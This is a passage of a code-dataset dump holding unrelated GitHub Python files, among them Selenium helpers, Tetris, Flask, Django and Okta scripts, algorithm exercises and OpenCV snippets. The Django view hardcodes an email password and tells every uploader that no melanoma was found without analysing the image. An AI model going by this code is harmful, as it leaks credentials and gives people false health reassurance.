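# input the loop never exits. Normalising the accept-state name fixes it:
MT["('s', 'y')"] = tupla_transicion('Si', '@', 'o')
# Worked trace on 'abb@' with that fix (each pass marks one 'a' as x and two
# 'b's as y):
#   s:a->x,R | t:b->y,R | u:b->y,L | v:y->y,L | v:x->x,R | s:y->Si (accept)
# (Separately, the final `result` check chains `!=` tests with `or`, so it is
# always True; comparing current_state against the accept state directly would
# be more informative.)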
elem\n\n    def __find_elements(self, locator: tuple):\n        \"\"\"\n        Pass in a locator tuple, locator=(By.XX, \"value\")\n        :param tuple locator:\n        :return: the list of matched element objects\n        \"\"\"\n        try:\n            elem = WebDriverWait(self.driver, self.timeout, self.poll_frequency).until(\n                lambda x: x.find_elements(*locator))\n            return True, elem\n        except NoSuchElementException:\n            log('元素[' + locator[1] + ']等待出现超时')\n            return False, '元素[' + locator[1] + ']等待出现超时'\n\n    def web_element_wait(self, **kwargs):\n        \"\"\"\n        Wait until an element is visible.\n        :return:\n        \"\"\"\n        try:\n            type_ = kwargs['type']\n            locator = kwargs['locator']\n        except KeyError:\n            return False, '未传需要等待元素的定位参数'\n        if type_ == 'id':\n            isok, logs = self.__find_element((By.ID, locator))\n        elif type_ == 'name':\n            isok, logs = self.__find_element((By.NAME, locator))\n        elif type_ == 'class':\n            isok, logs = self.__find_element((By.CLASS_NAME, locator))\n        elif type_ == 'xpath':\n            isok, logs = self.__find_element((By.XPATH, locator))\n        elif type_ == 'css':\n            isok, logs = self.__find_element((By.CSS_SELECTOR, locator))\n        else:\n            return False, '不能识别元素类型[' + type_ + ']'\n        if isok:\n            return True, '元素[' + locator + ']等待出现成功'\n        else:\n            return False, '元素[' + locator + ']等待出现超时'\n\n    def find_element(self, type_, locator):\n        \"\"\"\n        Locate a single element.\n        :param type_: locator type\n        :param locator: locator value\n        :return: the located element\n        \"\"\"\n        type_ = str.lower(type_)\n        try:\n            if type_ == 'id':\n                isok, elem = self.__find_element((By.ID, locator))\n            elif type_ == 'name':\n                isok, elem = self.__find_element((By.NAME, locator))\n            elif type_ == 'class':\n                isok, elem = self.__find_element((By.CLASS_NAME, locator))\n            elif type_ == 'xpath':\n                isok, elem = self.__find_element((By.XPATH, locator))\n            elif type_ == 'css':\n                isok, elem = self.__find_element((By.CSS_SELECTOR, locator))\n            else:\n                return False, '不能识别元素类型:[' + type_ + ']'\n        except Exception:\n            screenshot_path = self.get_screenshot_as_file()\n            return False, '获取[' + type_ + ']元素[' + locator + ']失败,已截图[' + screenshot_path + '].'\n        return isok, elem\n\n    def find_elements(self, type_, locator, index=0):\n        \"\"\"\n        Locate elements.\n        :param type_: locator type\n        :param locator: locator value\n        :return: the matched element at position index\n        \"\"\"\n        try:\n            if type_ == 'id':\n                isok, elem = self.__find_elements((By.ID, locator))\n            elif type_ == 'name':\n                isok, elem = self.__find_elements((By.NAME, locator))\n            elif type_ == 'class':\n                isok, elem = self.__find_elements((By.CLASS_NAME, locator))\n            elif type_ == 'xpath':\n                isok, elem = self.__find_elements((By.XPATH, locator))\n            elif type_ == 'css':\n                isok, elem = self.__find_elements((By.CSS_SELECTOR, locator))\n            else:\n                return False, '不能识别元素类型:[' + type_ + ']'\n        except Exception:\n            screenshot_path = self.get_screenshot_as_file()\n            return False, '获取[' + type_ + ']元素[' + locator + ']失败,已截图[' + screenshot_path + '].'\n        return isok, elem[index]\n\n    def element_click(self, **kwargs):\n        \"\"\"\n        Click an element.\n        :param kwargs:\n        :return:\n        \"\"\"\n        try:\n            type_ = kwargs['type']\n            locator = kwargs['locator']\n            index = kwargs.get('index') if kwargs.get('index') else 0\n        except KeyError:\n            return False, '缺少传参'\n        _isOK, _strLOG = self.find_elements(type_, locator, index)\n        if not _isOK:  # element not found: return the failure result\n            return _isOK, _strLOG\n        elem = _strLOG\n        try:\n            elem.click()\n        except Exception:\n            screenshot_path = self.get_screenshot_as_file()\n            return False, '元素[' + locator + ']点击失败,已截图[' + screenshot_path + '].'\n        return True, '元素[' + locator + ']点击成功'\n\n    def element_input(self, **kwargs):\n        \"\"\"\n        Send text to an element.\n        :param kwargs:\n        :return:\n        \"\"\"\n        try:\n            type_ = kwargs['type']\n            locator = kwargs['locator']\n            text = str(kwargs['input'])\n
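            # 'index' selects which of the matched elements to act on (the first by default)\n            index = 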
kwargs.get('index') if kwargs.get('index') else 0\n        except KeyError:\n            return False, '缺少传参'\n        _isOK, _strLOG = self.find_elements(type_, locator, index)\n        if not _isOK:  # element not found: return the failure result\n            return _isOK, _strLOG\n        elem = _strLOG\n        try:\n            elem.send_keys(text)\n        except Exception:\n            screenshot_path = self.get_screenshot_as_file()\n            return False, '元素[' + locator + ']输入[' + text + ']失败,已截图[' + screenshot_path + '].'\n        return True, '元素[' + locator + ']输入[' + text + ']成功'\n\n    def get_text(self, **kwargs):\n        \"\"\"\n        Get an element's text.\n        :param type_: locator type\n        :param locator: locator value\n        :return: the element's text value\n        \"\"\"\n        try:\n            type_ = kwargs['type']\n            locator = kwargs['locator']\n            index = kwargs.get('index') if kwargs.get('index') else 0\n        except KeyError:\n            return False, '缺少传参'\n        _isOK, elem = self.find_elements(type_, locator, index)\n        if _isOK:\n            elem = elem.text\n        return _isOK, elem\n","repo_name":"zw632948101/uiautomation","sub_path":"basefactory/webdriveroperator.py","file_name":"webdriveroperator.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"9705845881","text":"from constants import *\r\nimport pygame\r\n\r\n\r\nclass Tetromino:\r\n\r\n    def __init__(self, index: int, board: list):\r\n\r\n        self.index = index\r\n        self.board = board\r\n\r\n        self.shape = shapes[index]\r\n        self.colour = colours[index+1]\r\n        self.offset_data = offset_data[index]\r\n\r\n        self.row = 0\r\n        self.col = 5-len(self.shape[0])//2\r\n\r\n        self.rotation_index = 0\r\n\r\n        self.width = len(self.shape[0])\r\n        self.height = len(self.shape)\r\n\r\n        self.calc_ghost_row()\r\n\r\n\r\n    def calc_ghost_row(self):\r\n\r\n        row = self.row\r\n        while not self.invalid_position(row, self.col): row += 1\r\n        self.ghost_row = row-1\r\n\r\n\r\n    def invalid_position(self, r: int, c: int, shape=None, check_oob=True) -> bool:\r\n\r\n        if shape is None: shape = self.shape\r\n\r\n        for row in range(len(shape)):\r\n            for col in range(len(shape[0])):\r\n\r\n                if shape[row][col] == 0: continue\r\n\r\n                # Out of bounds\r\n                if not (0 <= r+row < 20 and 0 <= c+col < 10):\r\n                    if check_oob: return True\r\n                    else: continue\r\n\r\n                # Overlap with piece already on board\r\n                if self.board[r+row][c+col] > 0:\r\n                    return True\r\n\r\n        return False\r\n\r\n\r\n    def move_down(self) -> bool:\r\n\r\n        if self.invalid_position(self.row+1, self.col): return False\r\n        self.row += 1\r\n        return True\r\n\r\n\r\n    def drop_down(self) -> int:\r\n\r\n        n = self.ghost_row-self.row\r\n        self.row = self.ghost_row\r\n        return 2*n\r\n\r\n\r\n    def move_LR(self, direction: int) -> bool:\r\n\r\n        # 1 = move right, -1 = move left\r\n        if self.invalid_position(self.row, self.col+direction): return False\r\n\r\n        self.col += direction\r\n        self.calc_ghost_row()\r\n        return True\r\n\r\n\r\n    def rotate(self, direction: int):\r\n\r\n        # 1 = clockwise, -1 = counter-clockwise\r\n        new_rotation_index = (self.rotation_index+direction)%4\r\n\r\n        x1, y1 = self.offset_data[self.rotation_index]\r\n        x2, y2 = self.offset_data[new_rotation_index]\r\n\r\n        new_shape = list(zip(*self.shape[::-direction]))[::direction]\r\n        new_col = self.col + (x2-x1)\r\n        new_row = self.row + (y2-y1)\r\n\r\n        # Check if rotating tetromino will overlap existing pieces\r\n        if self.invalid_position(new_row, new_col, new_shape, check_oob=False): return\r\n\r\n        self.rotation_index = new_rotation_index\r\n        self.shape = new_shape\r\n        self.col = new_col\r\n        self.row = new_row\r\n\r\n        self.width = len(self.shape[0])\r\n        self.height = len(self.shape)\r\n
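\r\n        # The rotated matrix can have a different width and height, so the piece may\r\n        # now poke outside the 10x20 well; the clamps below pull it back onto the board.\r\n        # Check if 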
tetromino rotated out of bounds\r\n if self.col < 0: self.col = 0\r\n elif self.col > 10-self.width: self.col = 10-self.width\r\n\r\n if self.row < 0: self.row = 0\r\n elif self.row > 20-self.height: self.row = 20-self.height\r\n\r\n self.calc_ghost_row()\r\n\r\n \r\n def draw(self, screen):\r\n\r\n def draw_ghost():\r\n\r\n for row in range(self.height):\r\n for col in range(self.width):\r\n\r\n if self.shape[row][col] == 0: continue\r\n\r\n left = left_edge + sqr_size*(col+self.col)\r\n top = top_edge + sqr_size*(row+self.ghost_row)\r\n\r\n rect = pygame.Rect(left, top, sqr_size, sqr_size)\r\n pygame.draw.rect(screen, (140,140,140), rect)\r\n pygame.draw.rect(screen, (100,100,100), rect, 1)\r\n\r\n\r\n def draw_tetromino():\r\n\r\n for row in range(self.height):\r\n for col in range(self.width):\r\n\r\n if self.shape[row][col] == 0: continue\r\n\r\n left = left_edge + sqr_size*(col+self.col)\r\n top = top_edge + sqr_size*(row+self.row)\r\n\r\n rect = pygame.Rect(left, top, sqr_size, sqr_size)\r\n pygame.draw.rect(screen, self.colour, rect)\r\n pygame.draw.rect(screen, (100,100,100), rect, 1)\r\n\r\n\r\n if self.ghost_row > self.row: draw_ghost()\r\n draw_tetromino()\r\n","repo_name":"nscrrtta/tetris","sub_path":"tetromino.py","file_name":"tetromino.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23037830121","text":"import re\nfrom flask import Flask, request, render_template\nfrom jinja2 import evalcontextfilter, Markup, escape\nfrom lib.lang import *\nimport random\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef gen():\n lang_name = request.form.get('lang_name', '')\n input_text = request.form.get('input_text', '')\n translated = None\n grammar = None\n orpho_dictionary = None\n if request.method == 'POST':\n random.seed(lang_name)\n language = Language(generator)\n translated = language.translate(input_text)\n grammar = print_grammar(language)\n orpho_dictionary = print_dictionary(language)\n\n return render_template('gen.html',\n lang_name=lang_name,\n input_text=input_text,\n translated=translated,\n grammar=grammar,\n orpho_dictionary=orpho_dictionary\n )\n\n\n\n_paragraph_re = re.compile(r'(?:\\r\\n|\\r|\\n){2,}')\n\n@app.template_filter()\n@evalcontextfilter\ndef nl2br(eval_ctx, value):\n result = u'\\n\\n'.join(u'
<p>%s</p>' % p.replace('\\n', '<br>
\\n') \\\n for p in _paragraph_re.split(escape(value)))\n if eval_ctx.autoescape:\n result = Markup(result)\n return result\n","repo_name":"fratbots/resurrect-the-evolution","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25745474003","text":"import sys\nsys.path.append('/home/c3connol/Project_Sp21/modules/')\n\nimport game_functions as game, read_script, choose_film, script_variables\n\ndef lets_play():\n \"\"\" Main play game function.\n \n Note\n ----\n I heavily modified the script from the A3 chatbot.\n \n I also helped a student named Angela understand the chatbot code and why returns are important for functions.\n \n Another small note: I helped a few students debug their code (figure out error messages and why) so I should be \n credited in their project with what I helped them with.\n \n Parameters\n ----------\n none\n \n Returns\n -------\n '*snap*' : string\n Returns a Thanos snap if player wants to quit the game entirely.\n restart() : function\n Returns if player wants to play again.\n \"\"\"\n \n play = True \n \n while play:\n # Introduces and gets level\n level = game.get_level() \n \n # Uses level to print dialogue and gets guess \n guess = game.print_dialogue(level)\n \n # Checks if guess is correct and gets play status (continue playing or not)\n play_status = game.guess_movie(guess)\n \n # Decides whether to restart or end the game\n if play_status == True:\n break\n \n elif play_status == False:\n print('\\n')\n print('Okie dokie! Avengers dis-assemble, I guess!')\n return '*snap*'\n \n # This should never print out. If it does, something has gone very wrong.\n else:\n print('\\n')\n print(\"So, your code has failed spectacularly. You screwed up. \" +\n \"You know what you did was wrong. The question is, how are you going \" + \n \"to make things right? (To restart the game, rerun play.lets_play())\")\n return\n \n return restart()\n\ndef restart():\n \"\"\" Replay/continue playing function.\n \n Parameters\n ----------\n none\n \n Returns\n -------\n restart : string\n Returns what lets_play() returns.\n Either calls restart() again or returns a Thanos snap.\n \"\"\"\n \n restart = lets_play()\n \n return restart \n","repo_name":"caitlinsprojects-ml/marvel-mania","sub_path":"game_script/lets_play.py","file_name":"lets_play.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33184851835","text":"from django.shortcuts import render\nfrom .forms import SnippetForm\nfrom .models import Snippet\nfrom django.http import HttpResponseRedirect\nimport smtplib\nimport os\nfrom email.message import EmailMessage\n\nimport ssl\n\n# Create your views here.\ndef snippet_detail_view(request):\n form = SnippetForm(request.POST, request.FILES)\n if form.is_valid():\n print(\"VALID\\n\\n\\n\\n\")\n form.save()\n server = smtplib.SMTP('smtp.gmail.com', 587)\n #Next, log in to the server\n context = ssl.create_default_context()\n server.starttls(context=context)\n server.login(\"melanomai.proccess@gmail.com\", 'Wowzers!')\n\n #Send the mail\n msg = EmailMessage()\n \n msg.set_content(\"\"\"\n Hey there!\n MelanomAI has confirmed your email. We analyzed your image and we detected no Melanoma! 
Hooray!\n Thanks,\n The MelanomAI Team\n \"\"\")\n \n email = form.cleaned_data['email']\n msg[\"Subject\"] = \"MelanomAI Email Confirm\"\n msg[\"From\"] = 'melanomai.proccess@gmail.com'\n msg['To'] = email\n\n\n server.send_message(msg)\n server.quit()\n return HttpResponseRedirect('/thanks/')\n\n \n\n context = {'form': form}\n return render(request, 'C:/Users/Sumeet/Melanoma/myapp2/templates/form.html' ,context)\n\ndef thanks(request):\n return render(request, 'C:/Users/Sumeet/Melanoma/myapp2/templates/thanks.html')","repo_name":"YouCantTouchThis/MelanomaAIFinal","sub_path":"myapp2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31417529905","text":"#!/usr/bin/python\n# Okta oauth client credentials flow with Workflow identity federation\nimport os\nimport json\nimport requests\nimport base64\nimport secrets\n\n\ndef get_okta_token():\n okta_az_server = os.environ[\"OKTA_AZ_SERVER\"]\n client_id = os.environ[\"CLIENT_ID\"]\n client_secret = os.environ[\"CLIENT_SECRET\"]\n encodedData = base64.b64encode(bytes(f\"{client_id}:{client_secret}\", \"ISO-8859-1\")).decode(\"ascii\")\n\n cookies = {\n 'JSESSIONID': secrets.token_urlsafe(33),\n }\n\n headers = {\n 'Accept': '*/*',\n 'Authorization': 'Basic %s' % {encodedData},\n 'Cache-Control': 'no-cache',\n 'Content-Type': 'application/x-www-form-urlencoded',\n }\n\n data = {\n 'grant_type': 'client_credentials'\n }\n\n response = requests.post(okta_az_server,\n headers=headers, cookies=cookies, data=data)\n response.raise_for_status()\n print(\"Creating Okta token file\")\n data = response.json()\n with open('/tmp/okta-token.json', 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4)\n\n\nif __name__ == '__main__':\n print(\"Running main\")\n get_okta_token()\n","repo_name":"jasonbisson/terraform-google-workload-identity-federation","sub_path":"files/get_oidc_token.py","file_name":"get_oidc_token.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"26485024851","text":"import os\nimport sys\n\nfrom setuptools import setup\n\n\nDEBUG_BUILD = os.environ.get(\"SOURMASH_DEBUG\") == \"1\"\n\n\ndef build_native(spec):\n cmd = [\"cargo\", \"build\", \"--manifest-path\", \"src/core/Cargo.toml\", \"--lib\"]\n\n target = \"debug\"\n if not DEBUG_BUILD:\n cmd.append(\"--release\")\n target = \"release\"\n\n build = spec.add_external_build(cmd=cmd, path=\".\")\n\n rtld_flags = [\"NOW\"]\n if sys.platform == \"darwin\":\n rtld_flags.append(\"NODELETE\")\n spec.add_cffi_module(\n module_path=\"sourmash._lowlevel\",\n dylib=lambda: build.find_dylib(\"sourmash\", in_path=\"target/%s\" % target),\n header_filename=lambda: build.find_header(\"sourmash.h\", in_path=\"include\"),\n rtld_flags=rtld_flags,\n )\n\nsetup(\n milksnake_tasks=[build_native],\n package_dir={\"\": \"src\"},\n)\n","repo_name":"Domedriver/sourmash","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"7668566405","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n #to print the tree\n def __str__(self):\n i = 0\n ret = \"\\t\" * (i+1) + repr(self.val) + \"\\n\"\n tr = [self.left, self.right]\n for child in 
tr:\n ret += child.__str__()\n return ret\n\nclass Codec:\n\n def serialize(self, root: TreeNode) -> str:\n \"\"\"Encodes a tree to a single string.\n \"\"\"\n if root is None:\n return \"X\"\n left_subtree = self.serialize(root.left)\n right_subtree = self.serialize(root.right)\n return str(root.val) + \",\" + left_subtree + \",\" + right_subtree\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n \"\"\"\n nodes = data.split(\",\")\n self.point = 0\n \n def deserialize_helper():\n if nodes[self.point] == \"X\":\n self.point += 1\n return None\n root = TreeNode(int(nodes[self.point]))\n self.point += 1\n root.left = deserialize_helper()\n root.right = deserialize_helper()\n return root\n\n return deserialize_helper()\n\n# Your Codec object will be instantiated and called as such:\n# Your Codec object will be instantiated and called as such:\nser = Codec()\ndeser = Codec()\nroot = TreeNode(20)\nroot.left = TreeNode(8)\nroot.right = TreeNode(22)\n# root.left.left = TreeNode(4)\n# root.left.right = TreeNode(12)\n# root.right.left = TreeNode(10)\n# root.right.right = TreeNode(14)\nstr(root)\nprint(root)\ntree = ser.serialize(root) # root = [2,1,3] Inorder\nans = deser.deserialize(tree)\nstr(ans)\nprint(ans)","repo_name":"radhikasharma11/Leetcode","sub_path":"Serialize_Deserialize_BST.py","file_name":"Serialize_Deserialize_BST.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8666976043","text":"import pytest\nimport random\nimport os\nfrom percolation import *\n\ndef test_closed():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n for i in range(1,n+1):\n assert matrix.opened[i] == 0\n\ndef test_open():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n row = random.randint(1, n)\n col = random.randint(1, n)\n matrix.open(row,col)\n assert matrix.opened[(row-1)*n+(col)] == 1\n\ndef test_closed_not_percolates():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n assert matrix.percolates() == False\n \ndef test_open_percolates():\n random.seed(2)\n n = random.randint(1, 300)\n matrix = Percolation(n)\n for row in range(1, n+1):\n for col in range(1, n+1):\n matrix.open(row,col)\n assert matrix.percolates() == True\n\ndef test_files():\n for filename in os.listdir(os.getcwd()+'/tests'):\n file = open(os.getcwd()+'/tests/'+filename,\"r\")\n n =file.readline()\n n = n.strip()\n n = int(n)\n matrix = Percolation(n)\n percolates = file.readline()\n percolates = percolates.strip()\n data = [line.split() for line in file.readlines()]\n for i in data:\n if i != []:\n row = i[0]\n row = int(row)\n col = i[1]\n col = int(col)\n matrix.open(row,col)\n if percolates == \"yes\":\n assert matrix.percolates() == True\n else:\n assert matrix.percolates() == False\n \n\n# Percolation threshold has been established to be in 0.593\n# Adding sigma to account for randmoness\ndef test_percolation_mean():\n sigma = 0.01\n mean = PercolationStats.PercolationStats(200,10)\n mean_res = mean < (0.593 + sigma) and mean > (0.593 - sigma)\n assert mean_res == True\n","repo_name":"Fackelmann/algorithms_and_data_structures","sub_path":"UnionFind/test_percolation.py","file_name":"test_percolation.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10036487148","text":"import numpy as np\r\nimport cv2\r\n\r\nimg= 
cv2.imread('messi.jpg')\r\nimg2=cv2.imread('woman.jpg')\r\n\r\nprint(img.shape)\r\nprint(img.size)\r\nprint(img.dtype)\r\nb,g,r=cv2.split(img)\r\n\r\nimg= cv2.resize(img,(100,100))\r\nimg2=cv2.resize(img2,(100,100))\r\n\r\naddedImage=cv2.add(img2,img)\r\n\r\n#addedImageWeighted=cv2.add(img,0.9,img2,0.1,0)\r\n\r\n\r\n# img=cv2.merge((b,g,r))\r\n# ball=img[80:100,140:160]\r\n# img[120:140,60:80]=ball\r\ncv2.imshow('image', addedImage)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"Ricky-arch/OpenCV","sub_path":"basic_operations_on_images.py","file_name":"basic_operations_on_images.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43037891527","text":"# Quick Sort\n\ndef partition(A, p, r):\n x = A[r][0]\n i = p - 1\n for j in range(p, r):\n if A[j][0] <= x:\n i += 1\n A[i], A[j] = A[j], A[i]\n A[i + 1], A[r] = A[r], A[i + 1]\n return i + 1\n\n\ndef quicksort(A, p, r):\n if p < r:\n q = partition(A, p, r)\n quicksort(A, p, q - 1)\n quicksort(A, q + 1, r)\n\n\ndef check_stable(A, B):\n # A_dict[(num, char)] = そのnumに対応するcharがどういう順番で出現したか\n A_dict = {}\n B_dict = {}\n for num, char in A:\n if num not in A_dict:\n A_dict[num] = [char]\n else:\n A_dict[num].append(char)\n for num, char in B:\n if num not in B_dict:\n B_dict[num] = [char]\n else:\n B_dict[num].append(char)\n\n for num in A_dict:\n if A_dict[num] != B_dict[num]:\n return False\n\n return True\n\n\n\nn = int(input())\nA = []\nfor _ in range(n):\n char, num = input().split()\n num = int(num)\n A.append((num, char))\n\nB = A[:]\nquicksort(A, 0, n - 1)\nis_stable = check_stable(A, B)\n\nif is_stable:\n print(\"Stable\")\nelse:\n print(\"Not stable\")\n\nfor num, char in A:\n print(char, num)\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/ALDS1_6_C_1104.py","file_name":"ALDS1_6_C_1104.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70467833652","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 29 11:40:21 2022\n\n@author: luisg\n\"\"\"\n\n\nimport numpy as np\nimport pandas as pd\n\n#Exercise 1\n#The following Series is given (quotations variable):\n\n#PLW 387.0\n#CDR 339.5\n#TEN 349.5\n#11B 391.0\n#dtype: float64\n\n#Convert the quotations to the DataFrame and set the column name to 'price'.\n#In response, print this DataFrame to the console.\n\nstocks = {'PLW': 387.00, 'CDR': 339.5, 'TEN': 349.5, '11B': 391.0}\nquotations = pd.Series(data=stocks)\n\nquotations = pd.DataFrame(quotations, columns=['price'])\nprint(quotations)\n\n\n\n#Exercise 2\n#Using the numpy and pandas create the following Series:\n\n#101 10.0\n#102 20.0\n#103 30.0\n#104 40.0\n#105 50.0\n#106 60.0\n#107 70.0\n#108 80.0\n#109 90.0\n#dtype: float64\n\n#In response, print this Series to the console.\n\n\nindex = np.arange(101, 110)\nvalor = np.arange(10, 100, 10)\nprint(pd.Series(valor, index=index))\n\n\n\n#Exercise 3\n#The following Series is given:\n\nseries = pd.Series(['001', '002', '003', '004'], list('abcd'))\n\n#Convert its type to int and print this Series to the console.\n\nseries = pd.Series(series, dtype='int')\nprint(series)\n\n#SOLUÇÃO DO EXERCICIO\nseries = pd.to_numeric(series)\nprint(series)\n\n\n\n\n\n\n","repo_name":"atico0/python","sub_path":"100 Days of Code Data Scientist Challenge 2022/day 32.py","file_name":"day 
32.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70741538614","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport urllib.request\n\nMIN_MATCH_COUNT = 10\n\ndef url_to_image(url):\n\tresp = urllib.request.urlopen(url)\n\timage = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n\timage = cv2.imdecode(image, cv2.IMREAD_COLOR)\n\treturn image\n\n\n# img1 = cv2.imread('../../frontend/repo/joico/Shampoo/Recortadas/BL_Shampoo_300ml.jpg',0) # queryImage\n# img2 = url_to_image('http://mlb-s2-p.mlstatic.com/854454-MLB26525962127_122017-O.jpg') # trainImage\n# img1 = cv2.imread('../frontend/repo/pruebaNike-Air-Force-1-Low-Moto-W-1100x553.png',0) # queryImage\n# img2 = cv2.imread('../frontend/repo/pruebanike-air-force-1-dominican-republic-de-lo-mio-release-date-2.jpg',0) # trainImage\n\n\n# Initiate SIFT detector\n# sift = cv2._SIFT()\nsift = cv2.xfeatures2d.SIFT_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\nFLANN_INDEX_KDTREE = 0\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 50)\n\nflann = cv2.FlannBasedMatcher(index_params, search_params)\n\nmatches = flann.knnMatch(des1,des2,k=2)\n\n# store all the good matches as per Lowe's ratio test.\ngood = []\nfor m,n in matches:\n if m.distance < 0.7*n.distance:\n good.append(m)\n\nif len(good)>MIN_MATCH_COUNT:\n src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n h,w = img1.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,M)\n\n img2 = cv2.polylines(img2,[np.int32(dst)],True,255,3, cv2.LINE_AA)\n\nelse:\n \n matchesMask = None\n\nprint (len(good),MIN_MATCH_COUNT)\nprint (len(good)/MIN_MATCH_COUNT) \n \n\ndraw_params = dict(matchColor = (0,255,0), # draw matches in green color\n singlePointColor = None,\n matchesMask = matchesMask, # draw only inliers\n flags = 2)\n\nimg3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)\n\nplt.imshow(img3, 'gray'),plt.show()\n\n\ncv2.destroyAllWindows()","repo_name":"jlobasso/imageMatcher","sub_path":"backend/ejemplos/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18406855329","text":"import itertools; import math; import operator; import random; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce, lru_cache; from heapq import *; import unittest; from typing import List;\ndef get_sol(): return Solution()\nclass Solution:\n # union find\n def equationsPossible(self, equations: List[str]) -> bool:\n # root = {} # also works\n # def find(x):\n # p=root.get(x,x)\n # if p==x: return p\n # root[x] = find(p)\n # return root[x]\n # def union(x,y):\n # root[find(x)]=find(y)\n root = {}\n def add(x):\n if x not in root:\n root[x] = x\n def find(x):\n if x not in root:\n p = x\n else:\n p = root[x]\n if p==x:\n return p\n root[x] = find(root[x])\n return root[x]\n def union(x,y):\n add(x),add(y)\n px,py = find(x), find(y)\n root[px]=root[py]\n\n # if x==y then 
x and y will belong to the same component\n for eq in equations:\n if eq[1]=='=':\n union(eq[0],eq[3])\n\n # if x!=y then x and y will belong the different components\n for eq in equations:\n if eq[1]=='!':\n px, py = find(eq[0]), find(eq[3])\n if px==py:\n return False\n return True\nclass Solution2:\n # graph coloring and dfs\n def equationsPossible(self, equations: List[str]) -> bool:\n colors={}\n def dfs(u,color):\n if u in colors: return\n colors[u]=color\n for v in g[u]:\n dfs(v,color)\n g=defaultdict(set)\n for a,sign,__,b in equations:\n if sign=='=':\n g[a].add(b)\n g[b].add(a)\n\n color=0\n for a,sign,__,b in equations:\n if sign=='=':\n if a not in colors:\n dfs(a,color)\n color+=1\n elif b not in colors:\n dfs(b,color)\n color+=1\n for a,sign,__,b in equations:\n if sign=='!':\n if a==b: return False\n if a not in colors or b not in colors:\n continue\n if colors[a]==colors[b]: return False\n return True\n\nclass MyTestCase(unittest.TestCase):\n def test_1(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a==b\",\"b!=a\"]))\n def test_2(self):\n self.assertEqual(True, get_sol().equationsPossible([\"b==a\",\"a==b\"]))\n def test_3(self):\n self.assertEqual(True, get_sol().equationsPossible([\"a==b\",\"b==c\",\"a==c\"]))\n def test_4(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a==b\",\"b!=c\",\"c==a\"]))\n def test_5(self):\n self.assertEqual(True, get_sol().equationsPossible([\"c==c\",\"b==d\",\"x!=z\"]))\n def test_6(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a!=a\"]))\n def test_7(self):\n self.assertEqual(False, get_sol().equationsPossible([\"a==b\",\"e==c\",\"b==c\",\"a!=e\"]))\n def test_8(self):\n self.assertEqual(True, get_sol().equationsPossible([\"b==a\",\"a==b\"]))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc990.py","file_name":"lc990.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26896140247","text":"from .effnetv2_model import EffNetV2Model\r\nimport tensorflow as tf\r\nimport os\r\n\r\ndef EfficientNetV2(\r\n 